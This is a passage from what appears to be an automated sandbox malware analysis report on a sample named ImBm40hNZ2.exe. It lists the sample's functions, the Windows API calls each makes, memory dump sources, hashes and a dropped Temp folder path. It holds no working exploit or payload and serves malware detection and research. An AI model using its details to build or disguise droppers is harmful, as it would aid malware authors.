                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3F09BF19092A0DEF360DF688CC47063FE4E3983D6B03852AE358F6269EB3441448B19
                                                                                                                                                                                                                                                                Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 028b23817edcb9d5a681a2f1b90fbfdc039da7fad4989d98a1c85684b1a6955b
                                                                                                                                                                                                                                                                • Instruction ID: 7c1a0f30f71e3147f423eec4698c378af2d763e0b4495e0f7a0db1e5312df1a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 028b23817edcb9d5a681a2f1b90fbfdc039da7fad4989d98a1c85684b1a6955b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63D01277B08114D7DB00EBB5AE48A9E7364FB14324F208637D111F21D0D7B98551A629
                                                                                                                                                                                                                                                                Function 00403097 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 004030A5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                                                                                                • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                                                                                                                                                Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                • Opcode ID: aea1a711f5e69b3d6e24361e3102ff77a16b4b63784a5998fc523d22ac42562a
                                                                                                                                                                                                                                                                • Instruction ID: 7b7c5fc7cfdde63129b4467962d9d0565776b1c6548a4dcd8857098e901fc055
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aea1a711f5e69b3d6e24361e3102ff77a16b4b63784a5998fc523d22ac42562a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2D0C977B14100ABD750E7B9AE8949E73A8FB5136A7248833D902E2192E679D842862D
                                                                                                                                                                                                                                                                Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                                • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                                                                                                • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 004047F9 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404811
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 0040481C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
                                                                                                                                                                                                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404879
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004048EF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,?,00000000), ref: 004049E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404A29
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404A48
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C18
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404C28
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D59
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D79
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404DC7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404DD2
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404DD9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $M$N$XRS
                                                                                                                                                                                                                                                                • API String ID: 1638840714-1895184361
                                                                                                                                                                                                                                                                • Opcode ID: 73bb1ab9a9e2133c24622a305ca383e6cf0c15aed7991ea78ddb6c48e1fff29f
                                                                                                                                                                                                                                                                • Instruction ID: 85f2183cf6d0466de3af39f406c7ee36f40fbb46029595ad20bc80e91715a9ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73bb1ab9a9e2133c24622a305ca383e6cf0c15aed7991ea78ddb6c48e1fff29f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B0281B0A00209AFEB20DF55DD85AAE7BB5FB84315F14817AF610B62E1C7789D42CF58
                                                                                                                                                                                                                                                                Function 00404FBA Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040501A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405029
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405066
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040506E
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040508F
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A0
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 004050B3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 004050C1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050D4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004050F6
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040510A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040512B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040513B
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405154
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405160
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405038
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00000028,?,00000001,00403CE5), ref: 00403EC2
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040517C
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F4E,00000000), ref: 0040518A
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405191
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004051B4
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004051BB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405201
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405235
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405246
                                                                                                                                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040525B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000000FF), ref: 0040527B
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405294
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D0
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 004052E0
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004052E6
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,?), ref: 004052EF
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004052F9
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040530D
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405326
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405331
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405337
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 590372296-0
                                                                                                                                                                                                                                                                • Opcode ID: 321c2c842c20468486902e62f90d1f7b9072661f3d185b153136a8a975ac63fb
                                                                                                                                                                                                                                                                • Instruction ID: 3b51e898b73edb3ed70f647c70819dce3e7a22bfcdd564ae392b58196c58e3f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 321c2c842c20468486902e62f90d1f7b9072661f3d185b153136a8a975ac63fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59A14871D00208BFEB21AFA0DD85AAE7F79FB04354F10417AFA01BA1A0C7755E519FA9
                                                                                                                                                                                                                                                                Function 004042BD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040430C
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,?), ref: 00404336
                                                                                                                                                                                                                                                                • SHBrowseForFolderA.SHELL32(?,00428BF8,?), ref: 004043E7
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004043F2
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(Call,00429820), ref: 00404424
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,Call), ref: 00404430
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404442
                                                                                                                                                                                                                                                                  • Part of subcall function 00405389: GetDlgItemTextA.USER32(?,?,00000400,00404479), ref: 0040539C
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharNextA.USER32(?,"C:\Users\user\Desktop\ImBm40hNZ2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DFC: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030BA,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(004287F0,?,?,0000040F,?,004287F0,004287F0,?,00000000,004287F0,?,?,000003FB,?), ref: 004044FD
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404518
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000400,004287E0), ref: 0040459E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$Call$XRS
                                                                                                                                                                                                                                                                • API String ID: 2246997448-1237832267
                                                                                                                                                                                                                                                                • Opcode ID: c43d46147b4f9791c57c21938e1ca6ac7e49a3ca4b60a962b273954d3f040232
                                                                                                                                                                                                                                                                • Instruction ID: 21907f09a7f0adac02db5a20439709df020a6e4e4535a3db2c95f33fac12625f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43d46147b4f9791c57c21938e1ca6ac7e49a3ca4b60a962b273954d3f040232
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 039171B1900219BBDB11AFA1CC85BAF77B8EF84314F10447BFA04B62C1D77C9A418B69
                                                                                                                                                                                                                                                                Function 004062BC Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                                                                                                                                                                                                                                                • Instruction ID: 3a5e1ed114b5ac7a81718889c9b455730d92057392db997c28d832e9e546ba01
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fc2fbc5f6b99236c8936bb3f40f7556cf5b2ae230672f798b05916fdef3cfd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE18A71900709DFCB28CF58C880BAABBF5EB45305F15842EE897A76D1E338AA51CF54
